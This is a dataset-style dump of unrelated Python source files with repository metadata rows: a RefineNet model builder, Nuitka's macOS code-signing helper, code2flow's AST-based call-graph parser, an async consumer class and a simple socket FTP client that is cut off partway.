model = ResNet(Bottleneck, [3, 4, 6, 3], num_classes=num_classes, **kwargs)
if imagenet:
key = '50_imagenet'
url = models_urls[key]
pretrained_model_dict = maybe_download(key, url)
model.load_state_dict(pretrained_model_dict, strict=False)
use_pretrained_depth_track(model.state_dict(), pretrained_model_dict) ### new
elif pretrained:
dataset = data_info.get(num_classes, None)
if dataset:
bname = '50_' + dataset.lower()
key = 'rf_lw' + bname
url = models_urls[bname]
model.load_state_dict(maybe_download(key, url), strict=False)
return model
def rf_lw101(num_classes, imagenet=False, pretrained=True, **kwargs):
model = ResNet(Bottleneck, [3, 4, 23, 3], num_classes=num_classes, **kwargs)
if imagenet:
key = '101_imagenet'
url = models_urls[key]
pretrained_model_dict = maybe_download(key, url)
model.load_state_dict(pretrained_model_dict, strict=False)
use_pretrained_depth_track(model.state_dict(), pretrained_model_dict) ### new
elif pretrained:
dataset = data_info.get(num_classes, None)
if dataset:
bname = '101_' + dataset.lower()
key = 'rf_lw' + bname
url = models_urls[bname]
model.load_state_dict(maybe_download(key, url), strict=False)
return model
def rf_lw152(num_classes, imagenet=False, pretrained=True, **kwargs):
model = ResNet(Bottleneck, [3, 8, 36, 3], num_classes=num_classes, **kwargs)
if imagenet:
key = '152_imagenet'
url = models_urls[key]
pretrained_model_dict = maybe_download(key, url)
model.load_state_dict(pretrained_model_dict, strict=False)
use_pretrained_depth_track(model.state_dict(), pretrained_model_dict) ### new
elif pretrained:
dataset = data_info.get(num_classes, None)
if dataset:
bname = '152_' + dataset.lower()
key = 'rf_lw' + bname
url = models_urls[bname]
model.load_state_dict(maybe_download(key, url), strict=False)
return model
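# A minimal construction sketch (the flags are illustrative; weights are
# fetched on first use via maybe_download):
#
#   model = rf_lw50(num_classes=40, imagenet=True)
#   rgb = torch.randn(1, 3, 480, 640)
#   hha = torch.randn(1, 3, 480, 640)
#   logits = model(rgb, hha)   # (1, 40, 120, 160), i.e. 1/4 input resolution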
| 40.666 | 113 | 0.652584 | 2,788 | 20,333 | 4.576399 | 0.159254 | 0.020378 | 0.020064 | 0.019829 | 0.540403 | 0.510385 | 0.437495 | 0.401364 | 0.358962 | 0.323536 | 0 | 0.04087 | 0.249102 | 20,333 | 499 | 114 | 40.747495 | 0.7948 | 0.237447 | 0 | 0.388535 | 0 | 0 | 0.072987 | 0.001563 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057325 | false | 0 | 0.019108 | 0 | 0.136943 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b74fa4a9ab2a861ca9dfe686f9305fef41f97bb | 2,422 | py | Python | venv/Lib/site-packages/nuitka/utils/Signing.py | patmloi/PalettePal | 66c6528a990c8bd6159fad128b2aca559f3ea0a4 | [
"MIT"
] | 5,421 | 2018-09-24T08:04:06.000Z | 2022-03-31T20:02:37.000Z | nuitka/utils/Signing.py | sthagen/Nuitka | 61ee97ebb2eef310101869a078d71e3da36e20cd | [
"Apache-2.0"
] | 1,348 | 2018-09-22T13:41:00.000Z | 2022-03-31T22:33:40.000Z | nuitka/utils/Signing.py | sthagen/Nuitka | 61ee97ebb2eef310101869a078d71e3da36e20cd | [
"Apache-2.0"
] | 396 | 2018-09-28T15:37:03.000Z | 2022-03-29T10:52:09.000Z | # Copyright 2021, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Signing of executables.
"""
from nuitka.Tracing import postprocessing_logger
from .Execution import executeToolChecked
from .FileOperations import withMadeWritableFileMode
_macos_codesign_usage = "The 'codesign' is used to remove invalidated signatures on macOS and required to be found."
def removeMacOSCodeSignature(filename):
"""Remove the code signature from a filename.
Args:
filename - The file to be modified.
Returns:
None
Notes:
This is macOS specific.
"""
with withMadeWritableFileMode(filename):
executeToolChecked(
logger=postprocessing_logger,
command=["codesign", "--remove-signature", "--all-architectures", filename],
absence_message=_macos_codesign_usage,
)
def addMacOSCodeSignature(filename, identity, entitlements_filename, deep):
extra_args = []
# Ad-hoc ("weak") signing via the "-" identity is supported.
if not identity:
identity = "-"
command = [
"codesign",
"-s",
identity,
"--force",
"--timestamp",
"--all-architectures",
]
# Enable the hardened runtime unless ad-hoc signing (no real identity).
if identity != "-":
extra_args.append("--options=runtime")
if entitlements_filename:
extra_args.append("--entitlements")
extra_args.append(entitlements_filename)
if deep:
extra_args.append("--deep")
command.append(filename)
with withMadeWritableFileMode(filename):
executeToolChecked(
logger=postprocessing_logger,
command=command,
absence_message=_macos_codesign_usage,
)
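# A minimal usage sketch (the path and flags are illustrative only):
#
#   addMacOSCodeSignature(
#       filename="dist/app.bin",
#       identity=None,                 # falls back to ad-hoc "-" signing
#       entitlements_filename=None,
#       deep=False,
#   )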
| 28.162791 | 116 | 0.668869 | 266 | 2,422 | 6.007519 | 0.5 | 0.037547 | 0.037547 | 0.020025 | 0.148936 | 0.108886 | 0.108886 | 0.108886 | 0 | 0 | 0 | 0.004388 | 0.247316 | 2,422 | 85 | 117 | 28.494118 | 0.872189 | 0.405863 | 0 | 0.216216 | 0 | 0 | 0.160377 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.081081 | 0 | 0.135135 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b75eb422115a77ff7be5795b3c86cab8e94e70a | 8,144 | py | Python | code2flow/python.py | klaernie/code2flow | 6e76c316af2d62d54b181f9ba771a88ad671c93c | [
"MIT"
] | null | null | null | code2flow/python.py | klaernie/code2flow | 6e76c316af2d62d54b181f9ba771a88ad671c93c | [
"MIT"
] | null | null | null | code2flow/python.py | klaernie/code2flow | 6e76c316af2d62d54b181f9ba771a88ad671c93c | [
"MIT"
] | null | null | null | import ast
import logging
from .model import (OWNER_CONST, GROUP_TYPE, Group, Node, Call, Variable,
BaseLanguage, djoin)
def get_call_from_func_element(func):
"""
Given a python ast that represents a function call, clear and create our
generic Call object. Some calls have no chance at resolution (e.g. array[2](param))
so we return nothing instead.
:param func ast:
:rtype: Call|None
"""
assert type(func) in (ast.Attribute, ast.Name, ast.Subscript, ast.Call)
if type(func) == ast.Attribute:
owner_token = []
val = func.value
while True:
try:
owner_token.append(getattr(val, 'attr', val.id))
except AttributeError:
pass
val = getattr(val, 'value', None)
if not val:
break
if owner_token:
owner_token = djoin(*reversed(owner_token))
else:
owner_token = OWNER_CONST.UNKNOWN_VAR
return Call(token=func.attr, line_number=func.lineno, owner_token=owner_token)
if type(func) == ast.Name:
return Call(token=func.id, line_number=func.lineno)
if type(func) in (ast.Subscript, ast.Call):
return None
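# A small example (a sketch): resolving the call in "a.b.c(x)".
#
#   call_node = ast.parse("a.b.c(x)").body[0].value   # the ast.Call
#   call = get_call_from_func_element(call_node.func)
#   # call.token == "c", call.owner_token == "a.b"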
def make_calls(lines):
"""
Given a list of lines, find all calls in this list.
:param lines list[ast]:
:rtype: list[Call]
"""
calls = []
for tree in lines:
for element in ast.walk(tree):
if type(element) != ast.Call:
continue
call = get_call_from_func_element(element.func)
if call:
calls.append(call)
return calls
def process_assign(element):
"""
Given an element from the ast which is an assignment statement, return a
Variable that points_to the type of object being assigned. For now, the
points_to is a string but that is resolved later.
:param element ast:
:rtype: Variable
"""
if type(element.value) != ast.Call:
return []
call = get_call_from_func_element(element.value.func)
ret = []
for target in element.targets:
if type(target) != ast.Name:
continue
token = target.id
ret.append(Variable(token, call, element.lineno))
return ret
def process_import(element):
"""
Given an element from the ast which is an import statement, return a
Variable that points_to the module being imported. For now, the
points_to is a string but that is resolved later.
:param element ast:
:rtype: Variable
"""
ret = []
for single_import in element.names:
assert isinstance(single_import, ast.alias)
token = single_import.asname or single_import.name
rhs = single_import.name
if hasattr(element, 'module'):
rhs = djoin(element.module, rhs)
ret.append(Variable(token, points_to=rhs, line_number=element.lineno))
return ret
def make_local_variables(lines, parent):
"""
Given an ast of all the lines in a function, generate a list of
variables in that function. Variables are tokens and what they link to.
In this case, what it links to is just a string. However, that is resolved
later.
:param lines list[ast]:
:param parent Group:
:rtype: list[Variable]
"""
variables = []
for tree in lines:
for element in ast.walk(tree):
if type(element) == ast.Assign:
variables += process_assign(element)
if type(element) in (ast.Import, ast.ImportFrom):
variables += process_import(element)
if parent.group_type == GROUP_TYPE.CLASS:
variables.append(Variable('self', parent, lines[0].lineno))
variables = list(filter(None, variables))
return variables
def get_inherits(tree):
"""
Get what superclasses this class inherits
This handles exact names like 'MyClass' but skips things like 'cls' and 'mod.MyClass'
Resolving those would be difficult
:param tree ast:
:rtype: list[str]
"""
return [base.id for base in tree.bases if type(base) == ast.Name]
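# A small example (a sketch); dotted bases are skipped by design:
#
#   cls = ast.parse("class Foo(Base, mod.Other): pass").body[0]
#   get_inherits(cls)   # -> ["Base"]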
class Python(BaseLanguage):
@staticmethod
def assert_dependencies():
pass
@staticmethod
def get_tree(filename, _):
"""
Get the entire AST for this file
:param filename str:
:rtype: ast
"""
with open(filename) as f:
tree = ast.parse(f.read())
return tree
@staticmethod
def separate_namespaces(tree):
"""
Given an AST, recursively separate that AST into lists of ASTs for the
subgroups, nodes, and body. This is an intermediate step to allow for
cleaner processing downstream
:param tree ast:
:returns: tuple of group, node, and body trees. These are processed
downstream into real Groups and Nodes.
:rtype: (list[ast], list[ast], list[ast])
"""
groups = []
nodes = []
body = []
for el in tree.body:
if type(el) == ast.FunctionDef:
nodes.append(el)
elif type(el) == ast.ClassDef:
groups.append(el)
elif getattr(el, 'body', None):
tup = Python.separate_namespaces(el)
groups += tup[0]
nodes += tup[1]
body += tup[2]
else:
body.append(el)
return groups, nodes, body
@staticmethod
def make_nodes(tree, parent):
"""
Given an ast of all the lines in a function, create the node along with the
calls and variables internal to it.
:param tree ast:
:param parent Group:
:rtype: list[Node]
"""
token = tree.name
line_number = tree.lineno
calls = make_calls(tree.body)
variables = make_local_variables(tree.body, parent)
is_constructor = False
if parent.group_type == GROUP_TYPE.CLASS and token in ['__init__', '__new__']:
is_constructor = True
import_tokens = []
if parent.group_type == GROUP_TYPE.FILE:
import_tokens = [djoin(parent.token, token)]
return [Node(token, calls, variables, parent, import_tokens=import_tokens,
line_number=line_number, is_constructor=is_constructor)]
@staticmethod
def make_root_node(lines, parent):
"""
The "root_node" is an implict node of lines which are executed in the global
scope on the file itself and not otherwise part of any function.
:param lines list[ast]:
:param parent Group:
:rtype: Node
"""
token = "(global)"
line_number = 0
calls = make_calls(lines)
variables = make_local_variables(lines, parent)
return Node(token, calls, variables, line_number=line_number, parent=parent)
@staticmethod
def make_class_group(tree, parent):
"""
Given an AST for the subgroup (a class), generate that subgroup.
In this function, we will also need to generate all of the nodes internal
to the group.
:param tree ast:
:param parent Group:
:rtype: Group
"""
assert type(tree) == ast.ClassDef
subgroup_trees, node_trees, body_trees = Python.separate_namespaces(tree)
group_type = GROUP_TYPE.CLASS
token = tree.name
display_name = 'Class'
line_number = tree.lineno
import_tokens = [djoin(parent.token, token)]
inherits = get_inherits(tree)
class_group = Group(token, group_type, display_name, import_tokens=import_tokens,
inherits=inherits, line_number=line_number, parent=parent)
for node_tree in node_trees:
class_group.add_node(Python.make_nodes(node_tree, parent=class_group)[0])
for subgroup_tree in subgroup_trees:
logging.warning("Code2flow does not support nested classes. Skipping %r in %r.",
subgroup_tree.name, parent.token)
return class_group
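# A minimal end-to-end sketch ("example.py" is a hypothetical source file):
#
#   tree = Python.get_tree("example.py", None)
#   group_trees, node_trees, body_trees = Python.separate_namespaces(tree)
#   # group_trees hold ClassDefs, node_trees FunctionDefs, body_trees the rest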
| 31.323077 | 92 | 0.608669 | 1,022 | 8,144 | 4.734834 | 0.219178 | 0.024799 | 0.014466 | 0.015706 | 0.243439 | 0.192188 | 0.158297 | 0.118206 | 0.086381 | 0.086381 | 0 | 0.001412 | 0.304396 | 8,144 | 259 | 93 | 31.444015 | 0.85278 | 0.276277 | 0 | 0.189781 | 0 | 0 | 0.020649 | 0 | 0 | 0 | 0 | 0 | 0.029197 | 1 | 0.087591 | false | 0.014599 | 0.109489 | 0 | 0.306569 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7954946d0bcc033a7f4598f5114def54b6aa67 | 3,461 | py | Python | compton/consumer.py | kaelzhang/python-compton | 03c6553cc98066f3698b7ab5d5a5ceb660c8f140 | [
"MIT"
] | null | null | null | compton/consumer.py | kaelzhang/python-compton | 03c6553cc98066f3698b7ab5d5a5ceb660c8f140 | [
"MIT"
] | 1 | 2020-03-26T09:53:01.000Z | 2020-03-26T09:53:01.000Z | compton/consumer.py | kaelzhang/python-compton | 03c6553cc98066f3698b7ab5d5a5ceb660c8f140 | [
"MIT"
] | null | null | null | import logging
from abc import ABC, abstractmethod
from typing import (
List,
Optional,
Iterable
)
from .common import (
check_vector,
stringify_vector,
Payload,
Vector,
Symbol
)
class Consumer(ABC):
@staticmethod
def check(consumer) -> None:
if not isinstance(consumer, Consumer):
raise ValueError(
f'consumer must be an instance of Consumer, but got `{consumer}`' # noqa: E501
)
for vector in consumer.vectors:
check_vector(vector, consumer)
def __str__(self) -> str:
try:
vectors = stringify_vector([
stringify_vector(vector)
for vector in self.vectors
])
except Exception:
return 'consumer<invalid>'
return f'consumer{vectors}'
@property
@abstractmethod
def vectors(self) -> Iterable[Vector]: # pragma: no cover
return
@property
def all(self) -> bool:
return False
@property
def concurrency(self) -> int:
return 0
def should_process(
self,
symbol: Symbol,
*payloads: Optional[Payload]
) -> bool:
return True
@abstractmethod
async def process(
self,
symbol: Symbol,
*payloads: Optional[Payload]
) -> None: # pragma: no cover
pass
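# A minimal subclass sketch (the vector value is illustrative; real vectors
# depend on the provider side of the pipeline):
#
#   class PrintConsumer(Consumer):
#       @property
#       def vectors(self):
#           return [("kline", "1m")]
#
#       async def process(self, symbol, *payloads):
#           print(symbol, payloads)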
logger = logging.getLogger(__name__)
class ConsumerSentinel:
def __init__(
self,
consumer: Consumer
):
Consumer.check(consumer)
self._consumer = consumer
self._vectors = set(consumer.vectors)
self._need_all_changes = bool(consumer.all)
self._changed = {}
self._processing = 0
concurrency = consumer.concurrency
self._max_processing = int(concurrency) if concurrency else 0
@property
def vectors(self):
return self._consumer.vectors
def satisfy(self, symbol, vector) -> bool:
if self._need_all_changes:
# If the consumer requires a change for every vector before processing
if symbol in self._changed:
changed = self._changed[symbol]
else:
changed = set()
self._changed[symbol] = changed
changed.add(vector)
if changed != self._vectors:
return False
# No concurrency limit
# Or does not reach the limit
return self._max_processing == 0 \
or self._processing < self._max_processing
def process(self, symbol, payloads: List[Payload], loop):
# We need to try/except around should_process: an exception raised in it
# would not propagate to the outside and interrupt the program,
# which would otherwise make failures hard to debug
try:
if not self._consumer.should_process(symbol, *payloads):
return
except Exception as e:
logger.error('consumer should_process error: %s', e)
return
if self._need_all_changes:
# Only if we start to process, then we clear changed
self._changed[symbol].clear()
self._processing += 1
loop.create_task(self._process(symbol, payloads))
async def _process(self, symbol, payloads):
try:
await self._consumer.process(symbol, *payloads)
except Exception as e:
logger.error('consumer process error: %s', e)
self._processing -= 1
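# A minimal wiring sketch (PrintConsumer is the hypothetical subclass
# sketched above; `payload` and the asyncio loop come from the caller):
#
#   sentinel = ConsumerSentinel(PrintConsumer())
#   if sentinel.satisfy("BTCUSDT", ("kline", "1m")):
#       sentinel.process("BTCUSDT", [payload], asyncio.get_event_loop())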
| 24.546099 | 95 | 0.583357 | 368 | 3,461 | 5.342391 | 0.309783 | 0.049847 | 0.034588 | 0.030519 | 0.139878 | 0.084435 | 0.084435 | 0 | 0 | 0 | 0 | 0.003925 | 0.337475 | 3,461 | 140 | 96 | 24.721429 | 0.853467 | 0.09477 | 0 | 0.247525 | 0 | 0 | 0.049648 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09901 | false | 0.009901 | 0.039604 | 0.049505 | 0.267327 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7957b89a8b599825048ab663a2ab0a235425df | 21,187 | py | Python | source/ftp_client.py | acris17/ftpsoft | 04bbf743e2c8c19bdeaacfb098b66824cd7fa6fb | [
"MIT"
] | null | null | null | source/ftp_client.py | acris17/ftpsoft | 04bbf743e2c8c19bdeaacfb098b66824cd7fa6fb | [
"MIT"
] | null | null | null | source/ftp_client.py | acris17/ftpsoft | 04bbf743e2c8c19bdeaacfb098b66824cd7fa6fb | [
"MIT"
] | null | null | null | # imports
import argparse
import os
import sys
from socket import *
# classes
class Client:
def __init__(self):
"""
goal: define class properties
type: (self) -> ()
"""
# input variables
self.userinput = ""
self.tokens = []
# socket variables
self.ftp_socket = None
self.host = ""
self.port = "21"
# login variables
self.username = ""
self.password = ""
# filesystem variables
self.client_cfg = "./ftp_client.cfg"
self.test_file = "./tests/testfile.txt"
# dataport variables
self.data_socket = None
self.data_address = ""
self.dataport_min = 60020
self.dataport_max = 61000
self.data_port = self.dataport_min
self.next_dataport = 1
self.dataport_backlog = 1
def start(self):
"""
goal: define client startup
type: (self) -> ()
"""
self.eventloop()
def eventloop(self):
"""
goal: define client eventloop
type: (self) -> ()
"""
while True:
self.userinput = menu("ftp>")
self.tokens = parser(self.userinput)
self.dispatch()
def configure(self):
"""
goal: configure client
type: (self) -> ()
"""
try:
for line in open(self.client_cfg):
tokens = parser(line)
command = tokens[0]
arglist = tokens[1:]
if command.startswith("# "):
pass
elif command == "host":
self.host = "".join(arglist)
elif command == "port":
self.port = "".join(arglist)
elif command == "data_port_max":
self.dataport_max = "".join(arglist)
elif command == "data_port_min":
self.dataport_min = "".join(arglist)
elif command == "default_ftp_port":
self.port = "".join(arglist)
elif command == "default_mode":
print("default mode = {}".format("".join(arglist)))
elif command == "default_debug_mode":
print("default debug mode = {}".format("".join(arglist)))
elif command == "default_verbose_mode":
print("default verbose mode = {}".format("".join(arglist)))
elif command == "default_test_file":
self.test_file = "".join(arglist)
elif command == "default_log_file":
print("default log file = {}".format("".join(arglist)))
except Exception as e:
print("ftp: configuration error: {}".format(e))
def arguments(self):
"""
goal: manage command line arguments
type: (self) -> ()
"""
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-H", "--hostname", help="enter hostname")
arg_parser.add_argument("-u", "--username", help="enter username")
arg_parser.add_argument("-w", "--password", help="enter password")
arg_parser.add_argument("-fp", "--ftp_port", help="enter port")
arg_parser.add_argument("-d", "--dataport", help="enter dataport range")
arg_parser.add_argument("-c", "--config", help="enter configuration file")
arg_parser.add_argument("-t", "--test", help="enter test file")
arg_parser.add_argument("-L", "--log", help="enter log file")
arg_parser.add_argument("-D", "--debug", help="toogle debug mode", choices=["on", "off"])
arg_parser.add_argument("-P", "--passive", help="passive mode", action="store_true")
arg_parser.add_argument("-A", "--active", help="active mode", action="store_true")
arg_parser.add_argument("-V", "--verbose", help="verbose mode", action="store_true")
arg_parser.add_argument("-T", "--test_default", help="run default test", action="store_true")
arg_parser.add_argument("--all", help="all output to log file, still display", action="store_true")
arg_parser.add_argument("--lall", help="log all output to this file")
arg_parser.add_argument("--only", help="only log all output", action="store_true")
arg_parser.add_argument("--version", help="display version", action="store_true")
arg_parser.add_argument("--info", help="display client info", action="store_true")
args = arg_parser.parse_args()
if args.hostname:
self.host = args.hostname
if args.username:
self.username = args.username
if args.password:
self.password = args.password
if args.ftp_port:
self.port = args.ftp_port
if args.dataport:
self.data_port = args.dataport
if args.config:
self.client_cfg = args.config
if args.test:
print("test = {}".format(args.test))
if args.log:
print("log = {}".format(args.log))
if args.debug:
print("debug = {}".format(args.debug))
if args.passive:
print("passive = {}".format(args.passive))
if args.active:
print("active = {}".format(args.active))
if args.verbose:
print("verbose = {}".format(args.verbose))
if args.test_default:
self.test_me()
sys.exit()
if args.all:
print("all = {}".format(args.all))
if args.lall:
print("lall = {}".format(args.lall))
if args.only:
print("only = {}".format(args.only))
if args.version:
print("version: 0.1")
sys.exit()
if args.info:
print("name: Andrew Cristancho")
print("id: 2702278")
sys.exit()
def dispatch(self):
"""
goal: execute valid commands
type: (self) -> ()
"""
try:
command = self.tokens[0].lower()
arglist = self.tokens[1:]
if command in ("exit", "bye", "quit"):
if self.ftp_socket:
ftp_logout(self.ftp_socket)
self.logout()
sys.exit()
elif command in ("pwd",):
if not arglist:
ftp_pwd(self.ftp_socket)
elif command in ("noop",):
if not arglist:
ftp_noop(self.ftp_socket)
elif command in ("logout", "close"):
if not arglist:
print("Logged out", self.username)
ftp_logout(self.ftp_socket)
self.logout()
elif command in ("type",):
if not arglist:
ftp_type(self.ftp_socket)
elif command in ("list", "dir", "ls"):
if not arglist:
self.data_socket = self.dataport()
if self.data_socket:
ftp_port(self.ftp_socket, self.data_address, self.data_port)
ftp_list(self.ftp_socket, self.data_socket)
self.data_socket = None
elif command in ("cwd", "cd"):
if len(arglist) == 1:
path = arglist[0]
ftp_cwd(self.ftp_socket, path)
elif command in ("cdup",):
if not arglist:
ftp_cdup(self.ftp_socket)
elif command in ("mkd", "mkdir"):
if len(arglist) == 1:
path = arglist[0]
ftp_mkd(self.ftp_socket, path)
elif command in ("dele", "delete"):
if len(arglist) == 1:
path = arglist[0]
ftp_dele(self.ftp_socket, path)
elif command in ("rmd", "rmdir"):
if len(arglist) == 1:
path = arglist[0]
ftp_rmd(self.ftp_socket, path)
elif command in ("rn", "rename"):
if len(arglist) == 2:
path = arglist[0]
new_path = arglist[1]
ftp_rn(self.ftp_socket, path, new_path)
elif command in ("retr", "get"):
if len(arglist) == 1:
# create data socket
path = arglist[0]
self.data_socket = self.dataport()
# retrieve file
if self.data_socket:
ftp_port(self.ftp_socket, self.data_address, self.data_port)
ftp_retr(self.ftp_socket, self.data_socket, path)
self.data_socket = None
elif command in ("stor", "put", "send"):
if len(arglist) == 1:
# create data socket
path = arglist[0]
self.data_socket = self.dataport()
# send file
if self.data_socket and os.path.exists(path) and os.path.isfile(path):
ftp_port(self.ftp_socket, self.data_address, self.data_port)
ftp_stor(self.ftp_socket, self.data_socket, path)
self.data_socket = None
elif command in ("appe", "append"):
if len(arglist) == 1:
# create data socket
path = arglist[0]
self.data_socket = self.dataport()
# send file
if self.data_socket and os.path.exists(path) and os.path.isfile(path):
ftp_port(self.ftp_socket, self.data_address, self.data_port)
ftp_appe(self.ftp_socket, self.data_socket, path)
self.data_socket = None
elif command in ("open", "ftp"):
if len(arglist) == 2 and arglist[1].isnumeric():
# attempt connection
host = arglist[0]
port = arglist[1]
self.ftp_socket = ftp_open(host, int(port))
# login to server
if self.ftp_socket:
# get server reply
print("Connected to {}".format(host))
reply = get_message(self.ftp_socket)
code, message = parse_reply(reply)
# login tree
if code != "230":
self.login()
else:
print("User logged in, proceed")
# debugging
elif command == "try":
# fast way to try (host, port) from config, for debugging
if len(arglist) == 0:
# atttempt connection
self.ftp_socket = ftp_open(self.host, int(self.port))
reply = get_message(self.ftp_socket)
code, message = parse_reply(reply)
# not logged in
if code == "530":
self.login()
else:
print("already logged in")
else:
print("Invalid command")
except Exception as e:
print("Error:", e)
def login(self):
"""
goal: define login protocol
type: (self) -> ()
help: Client.login <-> User.authenticate
"""
self.username = menu("username:")
self.password = menu("password:")
send_message(self.ftp_socket, self.username)
send_message(self.ftp_socket, self.password)
reply = get_message(self.ftp_socket)
code, message = parse_reply(reply)
if code == "230":
print("Logged into {}".format(self.host))
else:
print("Failed to log into {}".format(self.host))
self.logout()
def logout(self):
"""
goal: define logout protocol
type: (self) -> ()
"""
self.username = ""
self.password = ""
self.ftp_socket.close()
self.ftp_socket = None
def dataport(self):
"""
goal: create dataport
type: (self) -> socket | none
"""
try:
self.data_address = gethostbyname("")
self.next_dataport += 1
self.data_port = (self.dataport_min + self.next_dataport) % self.dataport_max
# create dataport
data_socket = socket(AF_INET, SOCK_STREAM)
data_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
data_socket.bind((self.data_address, self.data_port))
data_socket.listen(self.dataport_backlog)
return data_socket
except Exception as e:
print("Dataport error:", e)
return None
def test_me(self):
"""
goal: run test file
type: (self) -> ()
"""
if os.path.exists(self.test_file) and os.path.isfile(self.test_file):
for line in open(self.test_file):
tokens = parser(line)
command = tokens[0]
if command.startswith("# ") or not command:
pass
else:
self.tokens = tokens
self.dispatch()
pause = input("(press enter to continue): ")
# interface functions
def menu(prompt):
"""
goal: get and return userinput
type: (string) -> string
"""
userinput = input("{} ".format(prompt))
return userinput.strip()
def parser(userinput):
"""
goal: convert userinput into tokens
type: (string) -> [string]
"""
return userinput.strip().split()
# message functions
def send_message(ftp_socket, message):
"""
goal: send a message
type: (socket, string) -> ()
"""
if ftp_socket:
message = "\0" if not message else message
ftp_socket.send(message.encode())
def get_message(ftp_socket):
"""
goal: receive a message
type: (socket) -> string
"""
if ftp_socket:
return ftp_socket.recv(1024).decode()
def parse_reply(reply):
"""
goal: parse ftp server replay
type: (string) -> (string, string)
"""
tokens = parser(reply)
code = tokens[0]
message = " ".join(tokens[1:])
return code, message
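# A small example (a sketch):
#
#   parse_reply("230 User logged in")   # -> ("230", "User logged in")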
# ftp commands
def ftp_pwd(ftp_socket):
"""
goal: print working directory
type: (socket) -> ()
"""
if ftp_socket:
send_message(ftp_socket, "pwd")
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
if code == "200":
message = get_message(ftp_socket)
print(message)
def ftp_noop(ftp_socket):
"""
goal: simply recieve an ok reply
type: (socket) -> ()
"""
if ftp_socket:
send_message(ftp_socket, "noop")
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
if code == "200":
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
print(message)
def ftp_logout(ftp_socket):
"""
goal: logout user
type: (socket) -> ()
"""
if ftp_socket:
send_message(ftp_socket, "logout")
reply = get_message(ftp_socket)
def ftp_type(ftp_socket):
"""
goal: print out representation type
type: (socket) -> ()
"""
if ftp_socket:
send_message(ftp_socket, "type")
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
if code == "200":
rep_type = get_message(ftp_socket)
print("type =", rep_type)
def ftp_port(ftp_socket, address, port):
"""
goal: let server know about data port
type: (socket, string, int) -> ()
"""
if ftp_socket:
port_command = "port {} {}".format(address, port)
send_message(ftp_socket, port_command)
reply = get_message(ftp_socket)
def ftp_list(ftp_socket, data_socket):
"""
goal: list directory contents
type: (socket, socket) -> ()
"""
if ftp_socket and data_socket:
send_message(ftp_socket, "list")
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
if code == "200":
data_connection, data_host = data_socket.accept()
contents = get_message(data_connection)
print(contents)
data_connection.close()
def ftp_open(host, port=21):
"""
goal: create socket to host
type: (string, int) -> socket | none
"""
try:
ftp_socket = socket(AF_INET, SOCK_STREAM)
ftp_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
ftp_socket.connect((host, port))
return ftp_socket
except Exception as e:
print("ftp: Can't connect to '{}': {}".format(host, e))
return None
def ftp_cwd(ftp_socket, path):
"""
goal: change working directory
type: (socket, path) -> ()
"""
if ftp_socket:
cwd_command = "{} {}".format("cwd", path)
send_message(ftp_socket, cwd_command)
reply = get_message(ftp_socket)
def ftp_cdup(ftp_socket):
"""
goal: change to parent directory
type: (socket) -> ()
"""
if ftp_socket:
send_message(ftp_socket, "cdup")
reply = get_message(ftp_socket)
def ftp_mkd(ftp_socket, path):
"""
goal: make a directory
type: (socket, string) -> ()
"""
if ftp_socket:
mkd_command = "{} {}".format("mkd", path)
send_message(ftp_socket, mkd_command)
reply = get_message(ftp_socket)
def ftp_dele(ftp_socket, path):
"""
goal: delete a file
type: (socket, string) -> ()
"""
if ftp_socket:
dele_command = "{} {}".format("dele", path)
send_message(ftp_socket, dele_command)
reply = get_message(ftp_socket)
def ftp_rmd(ftp_socket, path):
"""
goal: remove directory
type: (socket, string) -> ()
"""
if ftp_socket:
rmd_command = "{} {}".format("rmd", path)
send_message(ftp_socket, rmd_command)
reply = get_message(ftp_socket)
def ftp_rn(ftp_socket, path, new_path):
"""
goal: rename a file
type: (socket, string, string) -> ()
"""
if ftp_socket:
rn_command = "{} {} {}".format("rn", path, new_path)
send_message(ftp_socket, rn_command)
reply = get_message(ftp_socket)
def ftp_retr(ftp_socket, data_socket, path):
"""
goal: retrieve a file
type: (socket, socket, path) -> ()
"""
if ftp_socket and data_socket:
retr_command = "{} {}".format("retr", path)
send_message(ftp_socket, retr_command)
reply = get_message(ftp_socket)
